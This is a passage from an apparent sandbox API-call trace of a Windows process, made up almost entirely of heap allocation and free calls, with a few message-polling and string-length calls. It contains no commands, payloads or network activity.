returned 0x29ee590 [0082.724] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee698 [0082.724] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a6b0b8 [0082.724] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x29e3cc8 [0082.724] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee710 [0082.724] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a6b608 [0082.724] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee710 | out: hHeap=0x2af0000) returned 1 [0082.724] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x29e3b88 [0082.724] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee638 [0082.724] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee710 [0082.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6b718 [0082.725] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee590 | out: hHeap=0x2af0000) returned 1 [0082.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x29e3bb0 [0082.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a6b6c8 [0082.725] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.725] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e3bb0 | out: hHeap=0x2af0000) returned 1 [0082.725] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6b6c8 | out: hHeap=0x2af0000) returned 1 [0082.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee650 [0082.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a6b628 [0082.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee590 [0082.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee728 [0082.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6b728 [0082.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6b6c8 [0082.725] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6b6c8 | out: hHeap=0x2af0000) returned 1 [0082.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee770 [0082.725] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6b728 | out: hHeap=0x2af0000) returned 1 [0082.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x29ee7b8 [0082.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x29e3bb0 [0082.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee4d0 [0082.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a6b5b8 [0082.725] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee4d0 | out: hHeap=0x2af0000) returned 1 [0082.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x29e3cf0 [0082.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee5a8 [0082.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee5d8 [0082.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0082.725] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee608 [0082.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a6b678 [0082.725] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee608 | out: hHeap=0x2af0000) returned 1 [0082.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x29e4218 [0082.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee5f0 [0082.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee4e8 [0082.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a6b778 [0082.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x29e4010 [0082.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee4d0 [0082.726] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a6b6b8 [0082.726] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee4d0 | out: hHeap=0x2af0000) returned 1 [0082.726] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x29e3ed0 [0082.726] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee608 [0082.726] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee4d0 [0082.726] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e4218 | out: hHeap=0x2af0000) returned 1 [0082.726] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6b678 | out: hHeap=0x2af0000) returned 1 [0082.726] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee5f0 | out: hHeap=0x2af0000) returned 1 [0082.726] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.726] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x29e4380 [0082.726] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee518 [0082.726] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a6b708 [0082.726] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee5f0 [0082.726] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6b728 [0082.726] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6b728 | out: hHeap=0x2af0000) returned 1 [0082.726] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6b588 [0082.726] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee530 [0082.726] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee668 [0082.726] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6b5a8 [0082.726] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee620 [0082.726] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6b5a8 | out: hHeap=0x2af0000) returned 1 [0082.726] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee620 | out: hHeap=0x2af0000) returned 1 [0082.726] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee668 | out: hHeap=0x2af0000) returned 1 [0082.726] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee530 | out: hHeap=0x2af0000) returned 1 [0082.726] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6b588 | out: hHeap=0x2af0000) returned 1 [0082.726] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6b738 [0082.726] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6b738 | out: hHeap=0x2af0000) returned 1 [0082.726] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed40 [0082.726] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.726] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6b588 [0082.726] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee620 [0082.726] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee668 [0082.726] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6b728 [0082.727] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee530 [0082.727] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29eea40 [0082.727] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6b6a8 [0082.727] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee848 [0082.727] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee9b0 [0082.727] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6b638 [0082.727] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee818 [0082.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6b638 | out: hHeap=0x2af0000) returned 1 [0082.727] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee908 [0082.727] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6b5c8 [0082.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6b5c8 | out: hHeap=0x2af0000) returned 1 [0082.727] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee8f0 [0082.727] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6b6e8 [0082.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6b6e8 | out: hHeap=0x2af0000) returned 1 [0082.727] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee980 [0082.727] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a6b768 [0082.727] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee9c8 [0082.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee818 | out: hHeap=0x2af0000) returned 1 [0082.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee9b0 | out: hHeap=0x2af0000) returned 1 [0082.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee908 | out: hHeap=0x2af0000) returned 1 [0082.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee8f0 | out: hHeap=0x2af0000) returned 1 [0082.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee848 | out: hHeap=0x2af0000) returned 1 [0082.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6b6a8 | out: hHeap=0x2af0000) returned 1 [0082.731] lstrlenW (lpString="20") returned 2 [0082.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee980 | out: hHeap=0x2af0000) returned 1 [0082.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6b768 | out: hHeap=0x2af0000) returned 1 [0082.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee9c8 | out: hHeap=0x2af0000) returned 1 [0082.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eea40 | out: hHeap=0x2af0000) returned 1 [0082.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee530 | out: hHeap=0x2af0000) returned 1 [0082.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6b728 | out: hHeap=0x2af0000) returned 1 [0082.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee530 [0082.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee890 [0082.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a6b648 [0082.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee668 | out: hHeap=0x2af0000) returned 1 [0082.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee620 | out: hHeap=0x2af0000) returned 1 [0082.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6b588 | out: hHeap=0x2af0000) returned 1 [0082.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee890 | out: hHeap=0x2af0000) returned 1 [0082.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6b648 | out: hHeap=0x2af0000) returned 1 [0082.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee530 | out: hHeap=0x2af0000) returned 1 [0082.731] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.731] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6b768 [0082.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee530 [0082.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee620 [0082.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6b588 [0082.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee668 [0082.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29eea28 [0082.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6b6a8 [0082.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29eeab8 [0082.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee938 [0082.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6b5a8 [0082.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee950 [0082.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6b5a8 | out: hHeap=0x2af0000) returned 1 [0082.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee920 [0082.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6b5c8 [0082.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6b5c8 | out: hHeap=0x2af0000) returned 1 [0082.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee8c0 [0082.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6b5a8 [0082.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6b5a8 | out: hHeap=0x2af0000) returned 1 [0082.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29eea70 [0082.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a6b5d8 [0082.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29eea10 [0082.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee950 | out: hHeap=0x2af0000) returned 1 [0082.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee938 | out: hHeap=0x2af0000) returned 1 [0082.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee920 | out: hHeap=0x2af0000) returned 1 [0082.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee8c0 | out: hHeap=0x2af0000) returned 1 [0082.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eeab8 | out: hHeap=0x2af0000) returned 1 [0082.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6b6a8 | out: hHeap=0x2af0000) returned 1 [0082.732] lstrlenW (lpString="30") returned 2 [0082.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eea70 | out: hHeap=0x2af0000) returned 1 [0082.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6b5d8 | out: hHeap=0x2af0000) returned 1 [0082.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eea10 | out: hHeap=0x2af0000) returned 1 [0082.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eea28 | out: hHeap=0x2af0000) returned 1 [0082.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee668 | out: hHeap=0x2af0000) returned 1 [0082.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6b588 | out: hHeap=0x2af0000) returned 1 [0082.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee668 [0082.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29eea10 [0082.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a6b6a8 [0082.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee620 | out: hHeap=0x2af0000) returned 1 [0082.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee530 | out: hHeap=0x2af0000) returned 1 [0082.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6b768 | out: hHeap=0x2af0000) returned 1 [0082.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eea10 | out: hHeap=0x2af0000) returned 1 [0082.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6b6a8 | out: hHeap=0x2af0000) returned 1 [0082.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee668 | out: hHeap=0x2af0000) returned 1 [0082.732] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.732] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6b738 [0082.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee620 [0082.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee530 [0082.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6b5c8 [0082.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee668 [0082.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee7d0 [0082.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6b5d8 [0082.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee968 [0082.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee9f8 [0082.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6b5a8 [0082.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee980 [0082.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6b5a8 | out: hHeap=0x2af0000) returned 1 [0082.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29eea88 [0082.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6b6c8 [0082.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6b6c8 | out: hHeap=0x2af0000) returned 1 [0082.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee818 [0082.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6b5e8 [0082.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6b5e8 | out: hHeap=0x2af0000) returned 1 [0082.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee998 [0082.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a6b678 [0082.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29eea40 [0082.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee980 | out: hHeap=0x2af0000) returned 1 [0082.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee9f8 | out: hHeap=0x2af0000) returned 1 [0082.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eea88 | out: hHeap=0x2af0000) returned 1 [0082.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee818 | out: hHeap=0x2af0000) returned 1 [0082.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee968 | out: hHeap=0x2af0000) returned 1 [0082.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6b5d8 | out: hHeap=0x2af0000) returned 1 [0082.733] lstrlenW (lpString="20") returned 2 [0082.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee998 | out: hHeap=0x2af0000) returned 1 [0082.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6b678 | out: hHeap=0x2af0000) returned 1 [0082.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eea40 | out: hHeap=0x2af0000) returned 1 [0082.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee7d0 | out: hHeap=0x2af0000) returned 1 [0082.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee668 | out: hHeap=0x2af0000) returned 1 [0082.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6b5c8 | out: hHeap=0x2af0000) returned 1 [0082.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee668 [0082.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29eeaa0 [0082.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a6b678 [0082.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee530 | out: hHeap=0x2af0000) returned 1 [0082.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee620 | out: hHeap=0x2af0000) returned 1 [0082.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6b738 | out: hHeap=0x2af0000) returned 1 [0082.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eeaa0 | out: hHeap=0x2af0000) returned 1 [0082.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6b678 | out: hHeap=0x2af0000) returned 1 [0082.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee668 | out: hHeap=0x2af0000) returned 1 [0082.734] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed40 | out: hHeap=0x2af0000) returned 1 [0082.734] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6b5c8 [0082.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee620 [0082.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6b5c8 | out: hHeap=0x2af0000) returned 1 [0082.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee668 [0082.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee620 | out: hHeap=0x2af0000) returned 1 [0082.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee530 [0082.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee668 | out: hHeap=0x2af0000) returned 1 [0082.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de40 | out: hHeap=0x2af0000) returned 1 [0082.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee5d8 | out: hHeap=0x2af0000) returned 1 [0082.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee5a8 | out: hHeap=0x2af0000) returned 1 [0082.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e3cf0 | out: hHeap=0x2af0000) returned 1 [0082.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6b5b8 | out: hHeap=0x2af0000) returned 1 [0082.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e3bb0 | out: hHeap=0x2af0000) returned 1 [0082.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee5f0 | out: hHeap=0x2af0000) returned 1 [0082.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee518 | out: hHeap=0x2af0000) returned 1 [0082.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6b708 | out: hHeap=0x2af0000) returned 1 [0082.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e4380 | out: hHeap=0x2af0000) returned 1 [0082.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee4d0 | out: hHeap=0x2af0000) returned 1 [0082.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee608 | out: hHeap=0x2af0000) returned 1 [0082.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e3ed0 | out: hHeap=0x2af0000) returned 1 [0082.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6b6b8 | out: hHeap=0x2af0000) returned 1 [0082.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e4010 | out: hHeap=0x2af0000) returned 1 [0082.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee7b8 | out: hHeap=0x2af0000) returned 1 [0082.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6b628 | out: hHeap=0x2af0000) returned 1 [0082.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee650 | out: hHeap=0x2af0000) returned 1 [0082.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee770 | out: hHeap=0x2af0000) returned 1 [0082.735] HeapFree (in: 